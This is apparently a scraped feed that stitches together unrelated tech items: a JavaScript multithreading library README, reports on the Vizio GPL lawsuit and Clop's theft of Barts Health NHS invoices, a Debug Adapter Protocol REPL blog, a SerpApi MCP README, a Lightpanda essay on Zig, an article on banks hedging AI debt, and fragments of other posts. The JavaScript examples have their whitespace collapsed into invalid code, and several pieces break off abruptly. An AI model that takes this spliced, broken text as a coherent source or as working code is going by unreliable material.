import{spawn,move,Semaphore}from"multithreading";// Initialize with 3 permits (allowing 3 concurrent tasks)constsemaphore=newSemaphore(3);for(leti=0;i<10;i++){spawn(move(semaphore),async(sem)=>{console.log("Waiting for slot...");// Will wait (async) if 3 threads are already working
using _=awaitsem.acquire();console.log("Acquired slot! Working...");awaitnewPromise(r=>setTimeout(r,1000));// Guard is disposed automatically, releasing the permit for the next thread});}
Manual Release
Like the Mutex, if you cannot use the
using
keyword, you can manually manage the lifecycle.
spawn(move(semaphore),async(sem)=>{const{ drop }=awaitimport("multithreading");// Acquire 2 permits at onceconstguard=awaitsem.acquire(2);try{// Critical Section}finally{// Release the 2 permitsdrop(guard);}});
4. Condvar (Condition Variable)
A
Condvar
allows threads to wait for a specific condition to become true. It saves CPU resources by putting the task to sleep until it is notified, rather than constantly checking a value.
import{spawn,move,Mutex,Condvar}from"multithreading";constmutex=newMutex(newInt32Array(newSharedArrayBuffer(4)));constcv=newCondvar();spawn(move(mutex,cv),async(lock,cond)=>{
using guard=awaitlock.acquire();// Wait until value is not 0while(guard.value[0]===0){// wait() unlocks the mutex, waits for notification, then re-locks.awaitcond.wait(guard);}console.log("Received signal, value is:",guard.value[0]);});
Channels (MPMC)
For higher-level communication, this library provides a
Multi-Producer, Multi-Consumer (MPMC)
bounded channel. This primitive mimics Rust's
std::sync::mpsc
but allows for multiple consumers. It acts as a thread-safe queue that handles backpressure, blocking receivers when empty and blocking senders when full.
Channels are the preferred way to coordinate complex workflows (like job queues or pipelines) between workers without manually managing locks.
Key Features
Arbitrary JSON Data:
Channels are backed by
SharedJsonBuffer
, allowing you to send any JSON-serializable value (objects, arrays, strings, numbers, booleans) through the channel, not just raw integers.
Bounded:
You define a capacity. If the channel is full,
send()
waits. If empty,
recv()
waits.
Clonable:
Both
Sender
and
Receiver
can be cloned and moved to different workers.
Reference Counted:
The channel automatically closes when all Senders are dropped (indicating no more data will arrive) or all Receivers are dropped.
Example: Worker Pipeline with Objects
import{spawn,move,channel}from"multithreading";// Create a channel that holds objectsconst[tx,rx]=channel<{hello: string}>();// Producer Threadspawn(move(tx),async(sender)=>{awaitsender.send({hello: "world"});awaitsender.send({hello: "multithreading"});// Sender is destroyed here, automatically closing the channel});// Consumer Threadspawn(move(rx.clone()),async(rx)=>{forawait(constvalueofrx){console.log(value);// { hello: "world" }}});// Because we cloned rx, we can also receive on the main thread forawait(constvalueofrx){console.log(value);// { hello: "world" }}
Importing Modules in Workers
One of the most difficult aspects of Web Workers is handling imports. This library handles this automatically, enabling you to use dynamic
await import()
calls inside your spawned functions.
You can import:
External Libraries:
Packages from npm/CDN (depending on environment).
Relative Files:
Files relative to the file calling
spawn
.
Note:
The function passed to
spawn
must be self-contained or explicitly import what it needs. It cannot access variables from the outer scope unless they are passed via
move()
.
Example: Importing Relative Files and External Libraries
// main.tsimport{spawn}from"multithreading";spawn(async()=>{// 1. Importing a relative file// This path is relative to 'main.ts' (the caller location)constutils=awaitimport("./utils.ts");// 2. Importing an external library (e.g., from a URL or node_modules resolution)const_=awaitimport("lodash");console.log("Magic number from relative file:",utils.magicNumber);console.log("Random number via lodash:",_.default.random(1,100));returnutils.magicNumber;});
API Reference
Runtime
spawn(fn)
: Runs a function in a worker.
spawn(move(arg1, arg2, ...), fn)
: Runs a function in a worker with specific arguments transferred or copied.
initRuntime(config)
: Initializes the thread pool (optional, lazy loaded by default).
shutdown()
: Terminates all workers in the pool.
Memory Management
move(...args)
: Marks arguments for transfer (ownership move) rather than structured clone. Accepts a variable number of arguments which map to the arguments of the worker function.
drop(resource)
: Explicitly disposes of a resource (calls
[Symbol.dispose]
). This is required for manual lock management in environments like Bun.
SharedJsonBuffer
: A class for storing JSON objects in shared memory.
Channels (MPMC)
channel<T>(capacity)
: Creates a new channel. Returns
[Sender<T>, Receiver<T>]
.
For advanced users interested in the internal mechanics:
Serialization Protocol
: The library uses a custom "Envelope" protocol (
PayloadType.RAW
vs
PayloadType.LIB
). This allows complex objects like
Mutex
handles to be serialized, sent to a worker, and rehydrated into a functional object connected to the same
SharedArrayBuffer
on the other side.
Atomics
: Synchronization is built on
Int32Array
backed by
SharedArrayBuffer
using
Atomics.wait
and
Atomics.notify
.
Import Patching
: The
spawn
function analyzes the stack trace to determine the caller's file path. It then regex-patches
import()
statements within the worker code string to ensure relative paths resolve correctly against the caller's location, rather than the worker's location.
Judge Signals Win for Software Freedom Conservancy in Vizio GPL Case
A California judge has tentatively sided with Software Freedom Conservancy in its GPL case over Vizio’s SmartCast TVs, but the final outcome of this week’s hearing is still pending.
Source: Pixabay
We’re waiting to hear the final outcome of a legal case involving the GPL that harkens back to the bad “good ol’ days” of Linux and open source.
This case involves an action brought against Vizio — a maker of relatively low‑cost flat panel TVs — by Software Freedom Conservancy, which claims that the company has been in violation of the General Public License, version 2 and Lesser General Public License, version 2.1 for many years. The case centers around the company’s SmartCast TVs, which employ Linux, BusyBox, and other software licensed under GPLv2 and LGPLv2.1, without making source code available.
SFC’s standing in the case is as a purchaser of a Vizio smart TV and not as a copyright holder.
SFC has reported that early Thursday morning Judge Sandy N. Leal of the Superior Court of California issued a tentative ruling supporting SFC’s claim that Vizio has a duty to provide SFC with the complete source code covered under open source licenses to a TV it purchased. Being tentative, the ruling isn’t final– such rulings are issued so that the parties know how the judge is leaning and can tailor their oral arguments — and it was issued before a hearing scheduled for 10 a.m. PST the same day.
So far there’s been no news coming out of that hearing, although we’ve reached out to SFC for a comment.
A Predictable Outcome
These days the GPL and other open source licenses have been court tested enough to make the outcome in a case like this somewhat predictable: the courts will support the terms of the license. This hasn’t always been the case. For many years after the first adoption of the GPL as a free software license, and even later when the term open source came into use, it wasn’t clear whether courts would support the terms of open source licensing.
That began to change in the first decade of the 21st century as cases were brought against violators of open source licenses, with license terms being upheld by the courts.
Then in September 2007 the Software Freedom Law Center filed the first-ever US GPL enforcement lawsuit. The defendant was Monsoon Multimedia, for its Hava
place‑shifting devices
that SFLC claimed shipped with BusyBox installed without provisions for the source code. That case was dismissed about a month later, after Monsoon agreed to publish source code, appoint a compliance officer, notify customers of their GPL rights, and pay an undisclosed sum.
Later that year, SFLC brought additional BusyBox-related GPL suits against other vendors, including Xterasys and Verizon, over failure to provide source code. Those were also settled with compliance commitments and payments.
Vizio: A Goliath in Disguise
In the case against Vizio, SFC is going against a company that can afford a deep pocket defense if it decides to play hardball. The Irvine, California-based company that was founded in 2002 as a designer of televisions, soundbars, and related software and accessories, was acquired by Walmart for $2.3 billion in a deal that was announced in February 2024 and closed that December.
While the acquisition was in progress, Bloomberg announced that Walmart planned to end sales of Vizio products at Amazon and Best Buy in order to turn the company into a private label brand available only at Walmart and Sam’s Club locations.
Christine Hall has been a journalist since 1971. In 2001, she began writing a weekly consumer computer column and started covering Linux and FOSS in 2002 after making the switch to GNU/Linux. Follow her on Twitter:
@BrideOfLinux
I am neither a web developer nor a code-golfer. Seasoned
code-golfers looking for a challenge can probably shrink this
solution further. However, such wizards are also likely to scoff at
any mention of counting lines of code, since CSS can be collapsed
into a single line. The number of characters is probably more
meaningful. The code can also be minified slightly by removing all
whitespace:
Barts Health NHS discloses data breach after Oracle zero-day hack
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 18:55:26
Barts Health NHS Trust has announced that Clop ransomware actors have stolen files from a database by exploiting a vulnerability in its Oracle E-business Suite software. [...]...
Barts Health NHS Trust, a major healthcare provider in England, announced that Clop ransomware actors have stolen files from one of its databases after exploiting a vulnerability in its Oracle E-business Suite software.
The stolen data are invoices spanning several years that expose the full names and addresses of individuals who paid for treatment or other services at Barts Health hospital.
Information of former employees who owed money to the trust, and suppliers whose data is already public, has also been exposed, the organization says.
In addition to Barts' files, the compromised database include files concerning accounting services the trust provided since April 2024 to Barking, Havering, and Redbridge University Hospitals NHS Trust.
Cl0p ransomware has leaked the stolen information on their leak portal on the dark web.
"The theft occurred in August, but there was no indication that trust data was at risk until November when the files were posted on the dark web,"
explained Barts
.
"To date no information has been published on the general internet, and the risk is limited to those able to access compressed files on the encrypted dark web."
The hospitals operator stated that it is in the process of getting a High Court order to ban the publication, use, or sharing of the exposed data by anyone, though such orders have limited effect in practice.
Barts Health NHS Trust runs five hospitals throughout the city of London, namely Mile End Hospital, Newham University Hospital, Royal London Hospital, St Bartholomew's Hospital, and Whipps Cross University Hospital.
The Clop ransomware gang has been exploiting a critical Oracle EBS flaw tracked as CVE-2025-61882 as a zero-day in data theft attacks
since early August
, stealing private information from a large number of organizations worldwide.
Barts has already informed the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner's Office (ICO) about the data theft incident.
The healthcare organization assured that Clop's attack did not impact its electronic patient record and clinical systems, and it is confident that its core IT infrastructure remains secure.
Patients who have paid Barts are recommended to check their invoices to determine what data was exposed and to stay vigilant for unsolicited communications, especially messages that request payment or the sharing of sensitive information.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
The Debug Adapter Protocol is a REPL protocol in disguise
A couple months back I created
nluarepl
. It’s a
REPL for the Neovim Lua interpreter with a little twist: It’s using the
Debug Adapter Protocol. And before that, I worked on
hprofdap
. Also a
kind of a REPL using DAP that lets you inspect Java heap dumps
(
.hprof
files) using OQL.
As the name might imply, a REPL isn’t the main use case for the Debug
Adapter Protocol (DAP). From the
DAP
page
:
The idea behind the Debug Adapter Protocol (DAP) is to abstract the
way how the debugging support of development tools communicates with
debuggers or runtimes into a protocol.
But it works surprisingly well for a REPL interface to a language
interpreter too.
The typical REPL shows you a prompt after which you can enter an
expression. You then hit
Enter
to submit the expression, it
gets evaluated and you’re presented with the result or an error.
The Debug Adapter protocol defines a
evaluate
command
which - as the name implies - evaluates expressions.
The definition for the payload the client needs to send looks like
this:
interface EvaluateArguments {/** * The expression to evaluate. */ expression:string;// [...]}
With a few more optional properties.
The (important bit) of the response format definition looks like
this:
interface EvaluateResponse extends Response { body: {/** * The result of the evaluate request. */ result:string;/** * The type of the evaluate result. * This attribute should only be returned by a debug adapter if the * corresponding capability `supportsVariableType` is true. */ type?:string;/** * If `variablesReference` is > 0, the evaluate result is structured and its * children can be retrieved by passing `variablesReference` to the * `variables` request as long as execution remains suspended. See 'Lifetime * of Object References' in the Overview section for details. */ variablesReference:number;// [...]}
result
is a string and there is optionally a type. The
neat bit is the
variablesReference
. It’s used to model
structured data - allowing to build a tree-like UI to drill down into
the details of a data structure.
Here is a demo to see it in action:
To get the data - or expand an option as shown in the demo above, the
client must call the
variables
command
with the
variablesReference
as payload. The
response has an array of variables, where a variable looks like
this:
interface Variable {/** * The variable's name. */ name:string;/** * The variable's value. * This can be a multi-line text, e.g. for a function the body of a function. * For structured variables (which do not have a simple value), it is * recommended to provide a one-line representation of the structured object. * This helps to identify the structured object in the collapsed state when * its children are not yet visible. * An empty string can be used if no value should be shown in the UI. */ value:string;/** * The type of the variable's value. Typically shown in the UI when hovering * over the value. * This attribute should only be returned by a debug adapter if the * corresponding capability `supportsVariableType` is true. */ type?:string;/** * If `variablesReference` is > 0, the variable is structured and its children * can be retrieved by passing `variablesReference` to the `variables` request * as long as execution remains suspended. See 'Lifetime of Object References' * in the Overview section for details. */ variablesReference:number;// [...]}
A
Variable
is pretty similar to the initial
evaluate
result, except that it has both name and value. It
also again has a
variablesReference
property, which means
that they can be arbitrarily deeply nested (and you can have cyclic
references).
This already covers most of the functionality of a typical REPL
backend. One more feature that’s nice to have is completion, and the
Debug Adapter Protocol also has a
completions
command
for that. Click on the link if you’re interested - I won’t
go into detail about that here.
Another untypical feature for a REPL that the Debug Adapter Protocol
provides is finding the locations of a variable definition. That’s also
implemented in
nluarepl
, although
it only works for functions.
You might be wondering if there is anything in the Debug Adapter
Protocol one must implement that’s useless baggage if all you want is a
REPL frontend or backend.
Yes, there are are a few things:
There’s the RPC mechanism, which is close to JSON-RPC, but not
quite.
Breakpoint handling. You can send back a response that rejects all.
(
nluarepl
implements log points - which is basically dynamic log statements you
can create at runtime)
Session initialization. Here you can send back the
capabilities.
launch
/
attach
pseudo handling.
Disconnect/terminate handling. Not much needed here - you can use
these to clean up any state.
The typical flow is that a client starts a debug session with a
initialize
command. Then the debug adapter replies with its
capabilities and a normal client follows up sending breakpoints. After
that it typically follows up with a
launch
command, which
in a normal scenario would launch the application you want to debug.
To give you an impression of what this entails, here’s a snippet of
the
nluarepl
code to implement the “dummy” actions:
Partly because of lazyness. From a development perspective I didn’t
want to have to implement another REPL UI. Going the DAP route let me
focus on the evaluation parts. And from a user perspective - I also
wanted to re-use UI elements from
nvim-dap
. I’m used
to that interface and have keymaps setup. I didn’t want to have another
slightly different interface with different keymaps or behavior.
SpaceX in Talks for Share Sale That Would Boost Valuation to $800B
A Model Context Protocol (MCP) server implementation that integrates with
SerpApi
for comprehensive search engine results and data extraction.
Features
Multi-Engine Search
: Google, Bing, Yahoo, DuckDuckGo, YouTube, eBay, and
more
Real-time Weather Data
: Location-based weather with forecasts via search queries
Stock Market Data
: Company financials and market data through search integration
Dynamic Result Processing
: Automatically detects and formats different result types
Flexible Response Modes
: Complete or compact JSON responses
JSON Responses
: Structured JSON output with complete or compact modes
Quick Start
SerpApi MCP Server is available as a hosted service at
mcp.serpapi.com
. In order to connect to it, you need to provide an API key. You can find your API key on your
SerpApi dashboard
.
You can configure Claude Desktop to use the hosted server:
The MCP server has one main Search Tool that supports all SerpApi engines and result types. You can find all available parameters on the
SerpApi API reference
.
The parameters you can provide are specific for each API engine. Some sample parameters are provided below:
To be honest, when I began working on Lightpanda, I chose Zig because I’m not smart enough to build a big project in C++ or Rust.
I like simple languages. I like Zig for the same reasons I like Go, C, and the KISS principle. Not just because I believe in this philosophy, but because I’m not capable of handling complicated abstractions at scale.
Before Lightpanda, I was doing a lot of Go. But building a web browser from scratch requires a low-level systems programming language to ensure great performance, so Go wasn’t an option. And for a project like this, I wanted more safety and modern tooling than C.
Why We Built Lightpanda in Zig
Our requirements were performance, simplicity, and modern tooling. Zig seemed like the perfect balance: simpler than C++ and Rust, top-tier performance, and better tooling and safety than C.
As we built the first iterations of the browser and dug deeper into the language, we came to appreciate features where Zig particularly shines: comptime metaprogramming, explicit memory allocators, and best-in-class C interoperability. Not to mention the ongoing work on compilation times.
Of course it’s a big bet. Zig is a relatively new language with a small ecosystem. It’s pre-1.0 with regular breaking changes. But we’re very bullish on this language, and we’re not the only ones:
Ghostty
,
Bun
,
TigerBeetle
, and
ZML
are all building with Zig. And with
Anthropic’s recent acquisition of Bun
, big tech is taking notice.
Here’s what we’ve learned.
What Lightpanda Needs from a Language
Before diving into specifics, let’s talk about what building a browser for web automation requires.
First, we needed a JavaScript engine. Without one, a browser only sees static HTML: no client-side rendering and no dynamic content. We chose V8, Chrome’s JavaScript engine, because it’s state of the art, widely used (
Node.js
,
Deno
), and relatively easy to embed.
V8 is written in C++, and doesn’t have a C API, which means any language integrating with it must handle C++ boundaries. Zig doesn’t interoperate directly with C++, but it has first-class C interop, and C remains the lingua franca of systems programming. We use C headers generated primarily from
rusty_v8
, part of the
Deno project
, to bridge between V8’s C++ API and our Zig code.
Beyond integration, performance and memory control were essential. When you’re crawling thousands of pages or running automation at scale, every millisecond counts. We also needed precise control over short-lived allocations like DOM trees, JavaScript objects, and parsing buffers. Zig’s explicit allocator model fits that need perfectly.
Why Not C++?
C++ was the obvious option: it powers virtually every major browser engine. But here’s what gave us pause.
Four decades of features
: C++ has accumulated enormous complexity over the years. There are multiple ways to do almost everything: template metaprogramming, multiple inheritance patterns, various initialization syntaxes. We wanted a language with one clear way to do things.
Memory management
: Control comes with constant vigilance. Use-after-free bugs, memory leaks, and dangling pointers are real risks. Smart pointers help, but they add complexity and runtime overhead. Zig’s approach of passing allocators explicitly makes memory management clearer and enables patterns like arenas more naturally.
Build systems
: Anyone who’s fought with CMake or dealt with header file dependencies knows this pain. For a small team trying to move quickly, we didn’t want to waste time debugging build configuration issues.
We’re not saying C++ is bad. It powers incredible software. But for a small team starting from scratch, we wanted something simpler.
Why not Rust?
Many people ask this next. It’s a fair challenge. Rust is a more mature language than Zig, offers memory safety guarantees, has excellent tooling, and a growing ecosystem.
Rust would have been a viable choice. But for Lightpanda’s specific needs (and honestly, for our team’s experience level) it introduced friction we didn’t want.
The Unsafe Rust Problem
When you need to do things the borrow checker doesn’t like, you end up writing unsafe Rust, which is surprisingly hard.
Zack
from
Bun
explores this in depth in his article
When Zig is safer and faster than Rust
.
Browser engines and garbage-collected runtimes are classic examples of code that fights the borrow checker. You’re constantly juggling different memory regions: per-page arenas, shared caches, temporary buffers, objects with complex interdependencies. These patterns don’t map cleanly to Rust’s ownership model. You end up either paying performance costs (using indices instead of pointers, unnecessary clones) or diving into unsafe code where raw pointer ergonomics are poor and Miri becomes your constant companion.
Zig takes a different approach. Rather than trying to enforce safety through the type system and then providing an escape hatch, Zig is designed for scenarios where you’re doing memory-unsafe things. It gives you tools to make that experience better: non-null pointers by default, the GeneralPurposeAllocator that catches use-after-free bugs in debug mode, and pointer types with good ergonomics.
Why Zig Works for Lightpanda
Zig sits in an interesting space. It’s a simple language that’s easy to learn, where everything is explicit: no hidden control flow, no hidden allocations.
Explicit Memory Management with Allocators
Zig makes you choose how memory is managed through allocators. Every allocation requires you to specify which allocator to use. This might sound tedious at first, but it gives you precise control.
Here’s what this looks like in practice, using an arena allocator:
This pattern matches browser workloads perfectly. Each page load gets its own arena. When the page is done, we throw away the entire memory chunk. No tracking individual allocations, no reference counting overhead, no garbage collection pauses. (Though we’re learning that single pages can grow large in memory, so we’re also exploring mid-lifecycle cleanup strategies). And you can chain arenas, to create short-lived objects inside a page lifecycle.
Compile-Time Metaprogramming
Zig’s comptime feature lets you write code that runs during compilation. We use this extensively to reduce boilerplate when bridging Zig and JavaScript.
When integrating V8, you need to expose native types to JavaScript. In most languages, this requires glue code for each type. To generate this glue you need some code generation, usually through Macros (Rust, C, C++). Macros are a completely different language, which has a lot of downsides. Zig’s comptime lets us automate this:
The registerType function uses comptime reflection to:
Find all public methods on Point
Generate JavaScript wrapper functions
Create property getters/setters for x and y
Handle type conversions automatically
This eliminates manual binding code and makes adding new types simple by using the same language at compile time and runtime.
C Interop That Just Works
Zig’s C interop is a first-class feature: you can directly import C header files and call C functions without wrapper libraries.
For example, we use cURL as our HTTP library. We can just import libcurl C headers in Zig and use the C functions directly:
It feels as simple as using C, except you are programming in Zig.
And with the build system it’s also very simple to add the C sources to build everything together (your zig code and the C libraries):
This simplicity of importing C mitigates the fact that the Zig ecosystem is still small, as you can use all the existing C libraries.
The Build System Advantage
Zig includes its own build system written in Zig itself. This might sound unremarkable, but compared to CMake, it’s refreshingly straightforward. Adding dependencies, configuring compilation flags, and managing cross-compilation all happen in one place with clear semantics. Runtime, comptime, build system: everything is in Zig, which makes things easier.
Cross-compilation in particular is usually a difficult topic, but it’s very easy with Zig. Some projects like
Uber
use Zig mainly as a build system and toolchain.
Compile times matter
Zig compiles fast. Our full rebuild takes under a minute. Not as fast as Go or an interpreted language, but enough to have a feedback loop that makes development feel responsive. In that regard, Zig is considerably faster than Rust or C++.
This is a strong focus of the Zig team. They are also a small team and they need fast compilation for the development of the language, as Zig is written in Zig (self-hosted). For that purpose, they are developing native compiler backends (i.e. not using LLVM), which is very ambitious and yet successful: it’s already the default backend for x86 in debug mode, with a significant improvement in build times (
3.5x faster for the Zig project itself
). And
incremental compilation
is on its way.
What We’ve Learned
After months of building Lightpanda in Zig, here’s what stands out.
The learning curve is manageable.
Zig’s simplicity means you can understand the entire language in a few weeks. Compared to Rust or C++, this makes a real difference.
The allocator model pays off.
Being able to create arena allocators per page load, per request, or per task gives us fine-grained memory control without tracking individual allocations.
The community
is small but helpful. Zig is still growing. The Discord community and
ziggit.dev
are active, and the language is simple enough that you can often figure things out by reading the standard library source.
Conclusion
Lightpanda wouldn’t exist without the work of the Zig Foundation and the community behind it. Zig has made it possible to build something as complex as a browser with a small team and a clear mental model, without sacrificing performance.
If you’re curious about Zig’s design philosophy or want to see how its compiler and allocator model work, the
official documentation
is the best place to start.
Zig is still pre-1.0, which means breaking changes can happen between versions. That said, we’ve found it stable enough for our production use, especially since the ecosystem has largely standardized on tracking the latest tagged releases rather than main. The language itself is well-designed, and most changes between versions are improvements that are worth adapting to. Just be prepared to update code when upgrading Zig versions.
What’s the hardest part about learning Zig?
The allocator model takes adjustment if you’re coming from garbage-collected languages. You need to think about where memory comes from and when it gets freed. But compared to Rust’s borrow checker or C++‘s memory management, it’s relatively straightforward once you understand the patterns.
Can Zig really replace C++ for browser development?
For building a focused browser like Lightpanda, yes. For replacing Chromium or Firefox, that’s unlikely: those projects have millions of lines of C++ and decades of optimization. We’re more likely to see Rust complementing C++ in those projects over time, for example how Firefox is leveraging
Servo
. But for new projects where you control the codebase, Zig is absolutely viable.
Where can I learn more about Zig?
Start with the
official Zig documentation
. The
Zig Learn
site provides practical tutorials. And join the community on
Discord
or
ziggit.dev
where developers actively help newcomers. The language is simple enough that reading standard library source code is also a viable learning approach.
Francis Bouvier
Cofounder & CEO
Francis previously cofounded BlueBoard, an ecommerce analytics platform acquired by ChannelAdvisor in 2020. While running large automation systems he saw how limited existing browsers were for this kind of work. Lightpanda grew from his wish to give developers a faster and more reliable way to automate the web.
Wall Street races to protect itself from AI bubble
Banks are lending unprecedented sums to technology giants building artificial intelligence infrastructure while quietly using derivatives to shield themselves from potential losses.
Wall Street finds itself in an unusual position as it prepares to lend staggering amounts to artificial intelligence companies. Even as banks facilitate what may become the largest borrowing binge in technology history, they are simultaneously deploying an arsenal of financial tools to protect themselves from the very bubble their money might be inflating.
The anxiety permeating credit markets tells the story. The cost of insuring Oracle debt against default through derivatives has climbed to levels not seen since the Global Financial Crisis. Morgan Stanley has explored using specialized insurance mechanisms to reduce exposure to its tech borrowers. Across trading desks, lenders are quietly hedging positions even as they publicly champion the transformative potential of artificial intelligence.
Unprecedented Wall Street lending to technology giants
Mega offerings from Oracle,
Meta
Platforms and Alphabet have pushed global bond issuance past $6.46 trillion in 2025. These hyperscalers, alongside electric utilities and related firms, are expected to spend at least $5 trillion racing to build data centers and infrastructure for technology promising to revolutionize the global economy.
The scale is so immense that issuers must tap virtually every major debt market, according to JPMorgan Chase analysis. These technology investments could take years to generate returns, assuming they deliver profits at all. The frenzied pace has left some lenders dangerously overexposed, prompting them to use credit derivatives, sophisticated bonds and newer financial products to shift underwriting risk to other investors.
Technology that may not translate to profits
Steven Grey, chief investment officer at Grey Value Management, emphasized that impressive technology does not automatically guarantee profitability. Those risks became tangible last week when a major outage halted trading at CME Group and served as a stark reminder that data center customers can abandon providers after repeated breakdowns. Following that incident, Goldman Sachs paused a planned $1.3 billion mortgage bond sale for CyrusOne, a data center operator.
Banks have turned aggressively to credit derivatives markets to reduce exposure. Trading of Oracle credit default swaps exploded to roughly $8 billion over the nine weeks ended November 28, according to analysis of trade repository data by Barclays credit strategist Jigar Patel. That compares to just $350 million during the same period last year.
Banks are providing the bulk of massive construction loans for data centers where Oracle serves as the intended tenant, likely driving much of this hedging activity, according to recent Morgan Stanley research. These include a $38 billion loan package and an $18 billion loan to build multiple new data center facilities in Texas, Wisconsin and New Mexico.
Hedging costs climb across the sector
Prices for protection have risen sharply across the board. A five year credit default swap agreement to protect $10 million of Microsoft debt from default would cost approximately $34,000 annually, or 34 basis points, as of Thursday. In mid October, that same protection cost closer to $20,000 yearly.
Andrew Weinberg, a portfolio manager at Saba Capital Management, noted that the spread on Microsoft default swaps appears remarkably wide for a company rated AAA. The hedge fund has been selling protection on the tech giant. By comparison, protection on Johnson & Johnson, the only other American company with a AAA rating, cost about 19 basis points annually on Thursday.
Weinberg suggested that selling protection on
Microsoft
at levels more than 50% wider than fellow AAA rated Johnson & Johnson represents a remarkable opportunity. Microsoft, which has not issued debt this year, declined to comment. Similar opportunities exist with Oracle, Meta and Alphabet, according to Weinberg. Despite their large debt raises, their credit default swaps trade at high spreads relative to actual default risk, making selling protection sensible. Even if these companies face downgrades, the positions should perform well because they already incorporate substantial potential bad news.
Sophisticated tools to Wall Street shift risk
Morgan Stanley, a key player in financing the artificial intelligence race, has considered offloading some data center exposure through a transaction known as a significant risk transfer. These deals can provide banks with default protection for between 5% and 15% of a designated loan portfolio. Such transfers often involve selling bonds called credit linked notes, which can have credit derivatives tied to companies or loan portfolios embedded within them. If borrowers default, the bank receives a payout covering its loss.
Morgan Stanley held preliminary talks with potential investors about a significant risk transfer tied to a portfolio of loans to businesses involved in AI infrastructure, Bloomberg reported Wednesday. Mark Clegg, a senior fixed income trader at Allspring Global Investments, observed that banks remain fully aware of recent market concerns about possible overinvestment and overvaluation. He suggested it should surprise no one that they might explore hedging or risk transfer mechanisms.
Private capital firms including Ares Management have been positioning themselves to absorb some bank exposure through significant risk transfers tied to data centers. The massive scale of recent debt offerings adds urgency to these efforts. Not long ago, a $10 billion deal in the American high grade market qualified as big. Now, with multi trillion dollar market capitalization companies and funding needs in the hundreds of billions, Teddy Hodgson, global co head of investment grade debt capital markets at Morgan Stanley, suggested that $10 billion represents merely a drop in the bucket. He noted that Morgan Stanley raised $30 billion for Meta in a drive by financing executed in a single day, an event not historically commonplace. Investors will need to adjust to bigger deals from
hyperscalers
given how much these companies have grown and how expensive capturing this opportunity will prove.
This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss PC woes, voice deepfakes, and mutual aid.
JOSEPH:
Today I’m speaking at the Digital Vulnerabilities in the Age of AI Summit (DIVAS) (good name) on a panel about the financial risks of AI. The way I see it, that applies to the scams and are being powered by AI.
As soon as a new technology is launched, I typically think of ways it might be abused. Sometimes I cover this, sometimes not, but the thought always crosses my mind. One example that did lead to coverage was
back at Motherboard in 2023
with an article called How I Broke Into a Bank Account With an AI-Generated Voice.
At the time, ElevenLabs had just launched. This company focuses on audio and AI and cloning voices. Basically you upload audio (originally that could be of anyone before ElevenLabs introduced some guardrails) and the company then lets you ‘say’ anything as that voice. I spoke to voice actors at the time who
were obviously very concerned
.
This post is for paid members only
Become a paid member for unlimited ad-free access to articles, bonus podcast content, and more.
bulk email delivery problems to outlook/hotmail/microsoft
May First Status Updates
status.mayfirst.org
2025-12-05 17:42:13
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Servers Affected/Servidores afectados: Mail relay servers
Period Affected/Horas afectadas: 2025-12-01 -
Date/Fecha: 2025-12-05
We are currently experiencing a higher than normal number of bounces when
sending bulk email to Microsoft email servers (i...
bulk email delivery problems to outlook/hotmail/microsoft
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Servers Affected/Servidores afectados: Mail relay servers
Period Affected/Horas afectadas: 2025-12-01 -
Date/Fecha: 2025-12-05
We are currently experiencing a higher than normal number of bounces when
sending bulk email to Microsoft email servers (including outlook.com, hotmail.com and
others).
This does not affect individual email.
We are working on it.
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEH5wwyzz8XamYf6A1oBTAWmB7dTUFAmkzX8UACgkQoBTAWmB7
dTXDFhAAn++09egH7+yChrO5FQNjN2BcMP9pdHv4vsfCM+HOEGga/soc3OY3ZDdb
jULRZKh5tV/rnWgsTIce2+JWoO3yjjnSGrqEY/qODP+2+JQeawbjgf1DlTf/LXC9
S0zDJS8YAgsvpZoMhD0eRJ22KG3MAtc2m7NPAzEScfUSv7t/ntJKNjCJ8WROYtee
Ox5MWXeApMe1C4LLfEpcOL21O8zJcbJaf/MyMaZBUt+8GefB6kbT64r0RDQgK0ec
6SuLnnjnrgas7pm9tW4ybWSbh68IupZij7lBmBXtosjh8cJL6m3RXR6akL2BumSe
1wLCjuW8PhU0E41lT3KmvQ7PP6ikxKbZ95G7Qf211YLTb+Vn+dskiTH9gAzlScZk
03zVHb2FtmDU37AohZ3coMOv8qsg7zJw7y8faiXAE6UP3fX9H9g0S7KpsUyq93q1
3sSDvp1Tfv2DrOI/63QTLzn68oPb44rzHwqPThqEoXBLfZ1q3A5gLU+cGcvEjq1A
Wkw3/n2mwZhfcy0YQjFGy/YhWVszxSJCscakKkCm4TbbYYgB+CXIu6k5r2o02yE/
Mu6J2br0rvR+7ahK8c8mi1jLga1pH9VvPJQYaAZWf+MZfegRvBRF6e24F3Tj7ccs
wgNfOVc1dmBMsx9EQ3g6TrGgu6trw58DMFYR+SzKbDTNjmBUwXY=
=pSac
-----END PGP SIGNATURE-----
We shape our environments, and thereafter they shape us.
Great technology does more than solve problems. It weaves itself into the world we inhabit. At its best, it can expand our capacity, our connectedness, our sense of what's possible. Technology can bring out the best in us.
Our current technological landscape, however, does the opposite. Feeds engineered to hijack attention and keep us scrolling, leaving a trail of anxiety and atomization in their wake. Digital platforms that increasingly mediate our access to transportation, work, food, dating, commerce, entertainment—while routinely draining the depth and warmth from everything they touch. For all its grandiose promises, modern tech often leaves us feeling alienated, ever more distant from who we want to be.
The people who build these products aren't bad or evil. Most of us got into tech with an earnest desire to leave the world better than we found it. But the incentives and cultural norms of the tech industry have coalesced around the logic of hyper-scale. It's become monolithic, magnetic, all-encompassing—an environment that shapes all who step foot there. While the business results are undeniable, so too are the downstream effects on humanity.
With the emergence of artificial intelligence, we stand at a crossroads. This technology holds genuine promise. It could just as easily pour gasoline on existing problems. If we continue to sleepwalk down the path of hyper-scale and centralization, future generations are sure to inherit a world far more dystopian than our own.
But there is another path opening before us.
Christopher Alexander spent his career exploring why some built environments deaden us, while others leave us feeling more human, more at home in the world. His work centered around the "quality without a name," this intuitive knowing that a place or an architectural element is in tune with life. By learning to recognize this quality, he argued, and constructing a building in dialogue with it, we could reliably create environments that enliven us.
We call this quality
resonance
